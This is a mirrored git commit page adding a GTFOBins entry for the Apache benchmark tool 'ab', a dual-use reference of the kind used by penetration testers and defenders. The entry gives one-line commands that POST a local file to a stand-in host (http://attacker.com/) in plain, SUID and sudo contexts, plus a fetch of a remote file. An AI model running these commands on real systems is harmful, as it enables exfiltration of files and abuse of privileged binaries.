mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-24 04:22:52 +01:00
Add ab
Co-authored-by: Nikola Pepelishev <nikola.pepelishev@azdio.com> Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
37aefcf82f
commit
e357d8f73f
26
_gtfobins/ab.md
Normal file
26
_gtfobins/ab.md
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
functions:
|
||||
file-upload:
|
||||
- description: Upload local file via HTTP POST request.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
ab -p $LFILE $URL
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request. The response is returned as part of the verbose output of the program with some limitations on the length.
|
||||
code: |
|
||||
URL=http://attacker.com/file_to_download
|
||||
ab -v2 $URL
|
||||
suid:
|
||||
- description: Upload local file via HTTP POST request.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
./ab -p $LFILE $URL
|
||||
sudo:
|
||||
- description: Upload local file via HTTP POST request.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
sudo ab -p $LFILE $URL
|
||||
---
|
Loading…
Reference in New Issue
Block a user